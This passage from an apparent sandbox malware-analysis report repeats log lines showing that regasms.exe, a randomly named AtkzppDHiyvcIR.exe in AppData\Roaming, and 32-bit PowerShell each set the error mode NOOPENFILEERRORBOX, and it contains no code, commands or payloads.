                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
